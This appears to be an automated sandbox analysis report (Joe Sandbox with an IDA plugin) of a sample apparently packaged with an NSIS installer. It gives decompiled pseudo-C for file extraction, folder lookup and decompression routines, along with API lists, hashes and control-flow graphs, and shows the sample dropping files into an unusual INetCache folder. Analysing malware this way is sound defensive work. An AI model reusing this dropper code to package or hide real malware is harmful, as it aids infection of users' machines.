                                                                          									_t62 =  *_t58( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
                                                                          									__eflags = _t62;
                                                                          									if(_t62 == 0) {
                                                                          										goto L30;
                                                                          									}
                                                                          									goto L26;
                                                                          								}
                                                                          								goto L30;
                                                                          							}
                                                                          							GetSystemDirectoryW(_t110, 0x400);
                                                                          							goto L30;
                                                                          						} else {
                                                                          							E00406150( *0x434f38, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
                                                                          							__eflags =  *_t110;
                                                                          							if( *_t110 != 0) {
                                                                          								L32:
                                                                          								__eflags = _t76 - 0x1a;
                                                                          								if(_t76 == 0x1a) {
                                                                          									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                          								}
                                                                          								goto L34;
                                                                          							}
                                                                          							E004062A4(_t76, _t108, _t110, _t110, _t76);
                                                                          							L30:
                                                                          							__eflags =  *_t110;
                                                                          							if( *_t110 == 0) {
                                                                          								goto L34;
                                                                          							}
                                                                          							_t76 = _v16;
                                                                          							goto L32;
                                                                          						}
                                                                          					}
                                                                          					__eflags = _t86 - 0x5a04;
                                                                          					if(_t86 == 0x5a04) {
                                                                          						goto L13;
                                                                          					}
                                                                          					__eflags = _t76 - 0x23;
                                                                          					if(_t76 == 0x23) {
                                                                          						goto L13;
                                                                          					}
                                                                          					__eflags = _t76 - 0x2e;
                                                                          					if(_t76 == 0x2e) {
                                                                          						goto L13;
                                                                          					} else {
                                                                          						_v8 = _v8 & 0x00000000;
                                                                          						goto L14;
                                                                          					}
                                                                          				}
                                                                          				 *_t110 =  *_t110 & 0x00000000;
                                                                          				if(_a4 == 0) {
                                                                          					return _t44;
                                                                          				}
                                                                          				return E00406282(_a4, _t44);
                                                                          			}































                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000), ref: 004063F8
                                                                          • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000), ref: 00406434
                                                                          • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                                          • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000), ref: 004064CB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 717251189-895301406
                                                                          • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                                          • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                                          • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                                          • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 960 40176f-401794 call 402c37 call 405bca 965 401796-40179c call 406282 960->965 966 40179e-4017b0 call 406282 call 405b53 lstrcatW 960->966 972 4017b5-4017b6 call 406516 965->972 966->972 975 4017bb-4017bf 972->975 976 4017c1-4017cb call 4065c5 975->976 977 4017f2-4017f5 975->977 985 4017dd-4017ef 976->985 986 4017cd-4017db CompareFileTime 976->986 979 4017f7-4017f8 call 405d4f 977->979 980 4017fd-401819 call 405d74 977->980 979->980 987 40181b-40181e 980->987 988 40188d-4018b6 call 4052e6 call 4030fa 980->988 985->977 986->985 989 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 987->989 990 40186f-401879 call 4052e6 987->990 1002 4018b8-4018bc 988->1002 1003 4018be-4018ca SetFileTime 988->1003 989->975 1024 401864-401865 989->1024 1000 401882-401888 990->1000 1004 402ac8 1000->1004 1002->1003 1006 4018d0-4018db CloseHandle 1002->1006 1003->1006 1007 402aca-402ace 1004->1007 1009 4018e1-4018e4 1006->1009 1010 402abf-402ac2 1006->1010 1012 4018e6-4018f7 call 4062a4 lstrcatW 1009->1012 1013 4018f9-4018fc call 4062a4 1009->1013 1010->1004 1018 401901-4022ec 1012->1018 1013->1018 1022 4022f1-4022f6 1018->1022 1023 4022ec call 4058e4 1018->1023 1022->1007 1023->1022 1024->1000 1025 401867-401868 1024->1025 1025->990
                                                                          C-Code - Quality: 61%
                                                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                          				void* __edi;
                                                                          				void* _t35;
                                                                          				void* _t43;
                                                                          				void* _t45;
                                                                          				FILETIME* _t51;
                                                                          				FILETIME* _t64;
                                                                          				void* _t66;
                                                                          				signed int _t72;
                                                                          				FILETIME* _t73;
                                                                          				FILETIME* _t77;
                                                                          				signed int _t79;
                                                                          				void* _t81;
                                                                          				void* _t82;
                                                                          				WCHAR* _t84;
                                                                          				void* _t86;
                                                                          
                                                                          				_t77 = __ebx;
                                                                          				 *(_t86 - 8) = E00402C37(0x31);
                                                                          				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
                                                                          				_t35 = E00405BCA( *(_t86 - 8));
                                                                          				_push( *(_t86 - 8));
                                                                          				_t84 = L"Call";
                                                                          				if(_t35 == 0) {
                                                                          					lstrcatW(E00405B53(E00406282(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry\\Agrafferne")), ??);
                                                                          				} else {
                                                                          					E00406282();
                                                                          				}
                                                                          				E00406516(_t84);
                                                                          				while(1) {
                                                                          					__eflags =  *(_t86 + 8) - 3;
                                                                          					if( *(_t86 + 8) >= 3) {
                                                                          						_t66 = E004065C5(_t84);
                                                                          						_t79 = 0;
                                                                          						__eflags = _t66 - _t77;
                                                                          						if(_t66 != _t77) {
                                                                          							_t73 = _t66 + 0x14;
                                                                          							__eflags = _t73;
                                                                          							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
                                                                          						}
                                                                          						asm("sbb eax, eax");
                                                                          						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                          						__eflags = _t72;
                                                                          						 *(_t86 + 8) = _t72;
                                                                          					}
                                                                          					__eflags =  *(_t86 + 8) - _t77;
                                                                          					if( *(_t86 + 8) == _t77) {
                                                                          						E00405D4F(_t84);
                                                                          					}
                                                                          					__eflags =  *(_t86 + 8) - 1;
                                                                          					_t43 = E00405D74(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                          					__eflags = _t43 - 0xffffffff;
                                                                          					 *(_t86 - 0x30) = _t43;
                                                                          					if(_t43 != 0xffffffff) {
                                                                          						break;
                                                                          					}
                                                                          					__eflags =  *(_t86 + 8) - _t77;
                                                                          					if( *(_t86 + 8) != _t77) {
                                                                          						E004052E6(0xffffffe2,  *(_t86 - 8));
                                                                          						__eflags =  *(_t86 + 8) - 2;
                                                                          						if(__eflags == 0) {
                                                                          							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                          						}
                                                                          						L31:
                                                                          						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                                          						__eflags =  *0x434f88;
                                                                          						goto L32;
                                                                          					} else {
                                                                          						E00406282("C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp", _t81);
                                                                          						E00406282(_t81, _t84);
                                                                          						E004062A4(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
                                                                          						E00406282(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp");
                                                                          						_t64 = E004058E4("C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
                                                                          						__eflags = _t64;
                                                                          						if(_t64 == 0) {
                                                                          							continue;
                                                                          						} else {
                                                                          							__eflags = _t64 == 1;
                                                                          							if(_t64 == 1) {
                                                                          								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                                          								L32:
                                                                          								_t51 = 0;
                                                                          								__eflags = 0;
                                                                          							} else {
                                                                          								_push(_t84);
                                                                          								_push(0xfffffffa);
                                                                          								E004052E6();
                                                                          								L29:
                                                                          								_t51 = 0x7fffffff;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					L33:
                                                                          					return _t51;
                                                                          				}
                                                                          				E004052E6(0xffffffea,  *(_t86 - 8)); // executed
                                                                          				 *0x434fb4 =  *0x434fb4 + 1;
                                                                          				_push(_t77);
                                                                          				_push(_t77);
                                                                          				_push( *(_t86 - 0x30));
                                                                          				_push( *((intOrPtr*)(_t86 - 0x20)));
                                                                          				_t45 = E004030FA(); // executed
                                                                          				 *0x434fb4 =  *0x434fb4 - 1;
                                                                          				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
                                                                          				_t82 = _t45;
                                                                          				if( *(_t86 - 0x1c) != 0xffffffff) {
                                                                          					L22:
                                                                          					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
                                                                          				} else {
                                                                          					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
                                                                          					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
                                                                          						goto L22;
                                                                          					}
                                                                          				}
                                                                          				CloseHandle( *(_t86 - 0x30)); // executed
                                                                          				__eflags = _t82 - _t77;
                                                                          				if(_t82 >= _t77) {
                                                                          					goto L31;
                                                                          				} else {
                                                                          					__eflags = _t82 - 0xfffffffe;
                                                                          					if(_t82 != 0xfffffffe) {
                                                                          						E004062A4(_t77, _t82, _t84, _t84, 0xffffffee);
                                                                          					} else {
                                                                          						E004062A4(_t77, _t82, _t84, _t84, 0xffffffe9);
                                                                          						lstrcatW(_t84,  *(_t86 - 8));
                                                                          					}
                                                                          					_push(0x200010);
                                                                          					_push(_t84);
                                                                          					E004058E4();
                                                                          					goto L29;
                                                                          				}
                                                                          				goto L33;
                                                                          			}



















                                                                          APIs
                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne,?,?,00000031), ref: 004017D5
                                                                            • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                            • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,0040325E), ref: 00405341
                                                                            • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 00405353
                                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne$C:\Users\user\AppData\Local\Temp\nsbA35F.tmp$C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll$Call
                                                                          • API String ID: 1941528284-1075994806
                                                                          • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                                          • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                                          • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                                          • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1026 4052e6-4052fb 1027 405301-405312 1026->1027 1028 4053b2-4053b6 1026->1028 1029 405314-405318 call 4062a4 1027->1029 1030 40531d-405329 lstrlenW 1027->1030 1029->1030 1031 405346-40534a 1030->1031 1032 40532b-40533b lstrlenW 1030->1032 1035 405359-40535d 1031->1035 1036 40534c-405353 SetWindowTextW 1031->1036 1032->1028 1034 40533d-405341 lstrcatW 1032->1034 1034->1031 1037 4053a3-4053a5 1035->1037 1038 40535f-4053a1 SendMessageW * 3 1035->1038 1036->1035 1037->1028 1039 4053a7-4053aa 1037->1039 1038->1037 1039->1028
                                                                          C-Code - Quality: 100%
                                                                          			E004052E6(signed int _a4, WCHAR* _a8) {
                                                                          				struct HWND__* _v8;
                                                                          				signed int _v12;
                                                                          				WCHAR* _v32;
                                                                          				long _v44;
                                                                          				int _v48;
                                                                          				void* _v52;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				WCHAR* _t27;
                                                                          				signed int _t28;
                                                                          				long _t29;
                                                                          				signed int _t37;
                                                                          				signed int _t38;
                                                                          
                                                                          				_t27 =  *0x433ec4;
                                                                          				_v8 = _t27;
                                                                          				if(_t27 != 0) {
                                                                          					_t37 =  *0x434fb4;
                                                                          					_v12 = _t37;
                                                                          					_t38 = _t37 & 0x00000001;
                                                                          					if(_t38 == 0) {
                                                                          						E004062A4(_t38, 0, 0x42c228, 0x42c228, _a4);
                                                                          					}
                                                                          					_t27 = lstrlenW(0x42c228);
                                                                          					_a4 = _t27;
                                                                          					if(_a8 == 0) {
                                                                          						L6:
                                                                          						if((_v12 & 0x00000004) == 0) {
                                                                          							_t27 = SetWindowTextW( *0x433ea8, 0x42c228); // executed
                                                                          						}
                                                                          						if((_v12 & 0x00000002) == 0) {
                                                                          							_v32 = 0x42c228;
                                                                          							_v52 = 1;
                                                                          							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                          							_v44 = 0;
                                                                          							_v48 = _t29 - _t38;
                                                                          							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                          							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                          						}
                                                                          						if(_t38 != 0) {
                                                                          							_t28 = _a4;
                                                                          							0x42c228[_t28] = 0;
                                                                          							return _t28;
                                                                          						}
                                                                          					} else {
                                                                          						_t27 = lstrlenW(_a8) + _a4;
                                                                          						if(_t27 < 0x1000) {
                                                                          							_t27 = lstrcatW(0x42c228, _a8);
                                                                          							goto L6;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t27;
                                                                          			}


















                                                                          APIs
                                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                          • lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,0040325E), ref: 00405341
                                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 00405353
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll
                                                                          • API String ID: 2531174081-1613315971
                                                                          • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                                          • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                                          • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                                          • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          [Figure: control-flow graph of function 004030FA, with nodes marked Executed / Not Executed]
                                                                          C-Code - Quality: 95%
                                                                          			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                          				signed int _v8;
                                                                          				int _v12;
                                                                          				intOrPtr _v16;
                                                                          				long _v20;
                                                                          				intOrPtr _v24;
                                                                          				short _v152;
                                                                          				void* _t65;
                                                                          				void* _t69;
                                                                          				long _t70;
                                                                          				intOrPtr _t75;
                                                                          				long _t76;
                                                                          				intOrPtr _t77;
                                                                          				void* _t78;
                                                                          				int _t88;
                                                                          				intOrPtr _t92;
                                                                          				intOrPtr _t95;
                                                                          				long _t96;
                                                                          				signed int _t97;
                                                                          				int _t98;
                                                                          				int _t99;
                                                                          				intOrPtr _t100;
                                                                          				void* _t101;
                                                                          				void* _t102;
                                                                          
                                                                          				_t97 = _a16;
                                                                          				_t92 = _a12;
                                                                          				_v12 = _t97;
                                                                          				if(_t92 == 0) {
                                                                          					_v12 = 0x8000;
                                                                          				}
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v16 = _t92;
                                                                          				if(_t92 == 0) {
                                                                          					_v16 = 0x41aa00;
                                                                          				}
                                                                          				_t62 = _a4;
                                                                          				if(_a4 >= 0) {
                                                                          					E0040332B( *0x434f58 + _t62);
                                                                          				}
                                                                          				if(E00403315( &_a16, 4) == 0) {
                                                                          					L41:
                                                                          					_push(0xfffffffd);
                                                                          					goto L42;
                                                                          				} else {
                                                                          					if((_a19 & 0x00000080) == 0) {
                                                                          						if(_t92 != 0) {
                                                                          							if(_a16 < _t97) {
                                                                          								_t97 = _a16;
                                                                          							}
                                                                          							if(E00403315(_t92, _t97) != 0) {
                                                                          								_v8 = _t97;
                                                                          								L44:
                                                                          								return _v8;
                                                                          							} else {
                                                                          								goto L41;
                                                                          							}
                                                                          						}
                                                                          						if(_a16 <= _t92) {
                                                                          							goto L44;
                                                                          						}
                                                                          						_t88 = _v12;
                                                                          						while(1) {
                                                                          							_t98 = _a16;
                                                                          							if(_a16 >= _t88) {
                                                                          								_t98 = _t88;
                                                                          							}
                                                                          							if(E00403315(0x416a00, _t98) == 0) {
                                                                          								goto L41;
                                                                          							}
                                                                          							_t69 = E00405E26(_a8, 0x416a00, _t98); // executed
                                                                          							if(_t69 == 0) {
                                                                          								L28:
                                                                          								_push(0xfffffffe);
                                                                          								L42:
                                                                          								_pop(_t65);
                                                                          								return _t65;
                                                                          							}
                                                                          							_v8 = _v8 + _t98;
                                                                          							_a16 = _a16 - _t98;
                                                                          							if(_a16 > 0) {
                                                                          								continue;
                                                                          							}
                                                                          							goto L44;
                                                                          						}
                                                                          						goto L41;
                                                                          					}
                                                                          					_t70 = GetTickCount();
                                                                          					 *0x40d364 =  *0x40d364 & 0x00000000;
                                                                          					 *0x40d360 =  *0x40d360 & 0x00000000;
                                                                          					_t14 =  &_a16;
                                                                          					 *_t14 = _a16 & 0x7fffffff;
                                                                          					_v20 = _t70;
                                                                          					 *0x40ce48 = 8;
                                                                          					 *0x4169f0 = 0x40e9e8;
                                                                          					 *0x4169ec = 0x40e9e8;
                                                                          					 *0x4169e8 = 0x4169e8;
                                                                          					_a4 = _a16;
                                                                          					if( *_t14 <= 0) {
                                                                          						goto L44;
                                                                          					} else {
                                                                          						goto L9;
                                                                          					}
                                                                          					while(1) {
                                                                          						L9:
                                                                          						_t99 = 0x4000;
                                                                          						if(_a16 < 0x4000) {
                                                                          							_t99 = _a16;
                                                                          						}
                                                                          						if(E00403315(0x416a00, _t99) == 0) {
                                                                          							goto L41;
                                                                          						}
                                                                          						_a16 = _a16 - _t99;
                                                                          						 *0x40ce38 = 0x416a00;
                                                                          						 *0x40ce3c = _t99;
                                                                          						while(1) {
                                                                          							_t95 = _v16;
                                                                          							 *0x40ce40 = _t95;
                                                                          							 *0x40ce44 = _v12;
                                                                          							_t75 = E004067BD(0x40ce38);
                                                                          							_v24 = _t75;
                                                                          							if(_t75 < 0) {
                                                                          								break;
                                                                          							}
                                                                          							_t100 =  *0x40ce40; // 0x41d800
                                                                          							_t101 = _t100 - _t95;
                                                                          							_t76 = GetTickCount();
                                                                          							_t96 = _t76;
                                                                          							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                          								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                          								_t102 = _t102 + 0xc;
                                                                          								E004052E6(0,  &_v152); // executed
                                                                          								_v20 = _t96;
                                                                          							}
                                                                          							if(_t101 == 0) {
                                                                          								if(_a16 > 0) {
                                                                          									goto L9;
                                                                          								}
                                                                          								goto L44;
                                                                          							} else {
                                                                          								if(_a12 != 0) {
                                                                          									_t77 =  *0x40ce40; // 0x41d800
                                                                          									_v8 = _v8 + _t101;
                                                                          									_v12 = _v12 - _t101;
                                                                          									_v16 = _t77;
                                                                          									L23:
                                                                          									if(_v24 != 1) {
                                                                          										continue;
                                                                          									}
                                                                          									goto L44;
                                                                          								}
                                                                          								_t78 = E00405E26(_a8, _v16, _t101); // executed
                                                                          								if(_t78 == 0) {
                                                                          									goto L28;
                                                                          								}
                                                                          								_v8 = _v8 + _t101;
                                                                          								goto L23;
                                                                          							}
                                                                          						}
                                                                          						_push(0xfffffffc);
                                                                          						goto L42;
                                                                          					}
                                                                          					goto L41;
                                                                          				}
                                                                          			}



























                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$wsprintf
                                                                          • String ID: ... %d%%$@
                                                                          • API String ID: 551687249-3859443358
                                                                          • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                          • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                                          • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                          • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1103 402644-40265d call 402c15 1106 402663-40266a 1103->1106 1107 402abf-402ac2 1103->1107 1109 40266c 1106->1109 1110 40266f-402672 1106->1110 1108 402ac8-402ace 1107->1108 1109->1110 1112 4027d6-4027de 1110->1112 1113 402678-402687 call 4061e2 1110->1113 1112->1107 1113->1112 1116 40268d 1113->1116 1117 402693-402697 1116->1117 1118 40272c-40272f 1117->1118 1119 40269d-4026b8 ReadFile 1117->1119 1120 402731-402734 1118->1120 1121 402747-402757 call 405df7 1118->1121 1119->1112 1122 4026be-4026c3 1119->1122 1120->1121 1124 402736-402741 call 405e55 1120->1124 1121->1112 1131 402759 1121->1131 1122->1112 1123 4026c9-4026d7 1122->1123 1126 402792-40279e call 4061c9 1123->1126 1127 4026dd-4026ef MultiByteToWideChar 1123->1127 1124->1112 1124->1121 1126->1108 1130 4026f1-4026f4 1127->1130 1127->1131 1134 4026f6-402701 1130->1134 1136 40275c-40275f 1131->1136 1134->1136 1138 402703-402728 SetFilePointer MultiByteToWideChar 1134->1138 1136->1126 1137 402761-402766 1136->1137 1139 4027a3-4027a7 1137->1139 1140 402768-40276d 1137->1140 1138->1134 1141 40272a 1138->1141 1143 4027c4-4027d0 SetFilePointer 1139->1143 1144 4027a9-4027ad 1139->1144 1140->1139 1142 40276f-402782 1140->1142 1141->1131 1142->1112 1145 402784-40278a 1142->1145 1143->1112 1146 4027b5-4027c2 1144->1146 1147 4027af-4027b3 1144->1147 1145->1117 1148 402790 1145->1148 1146->1112 1147->1143 1147->1146 1148->1112
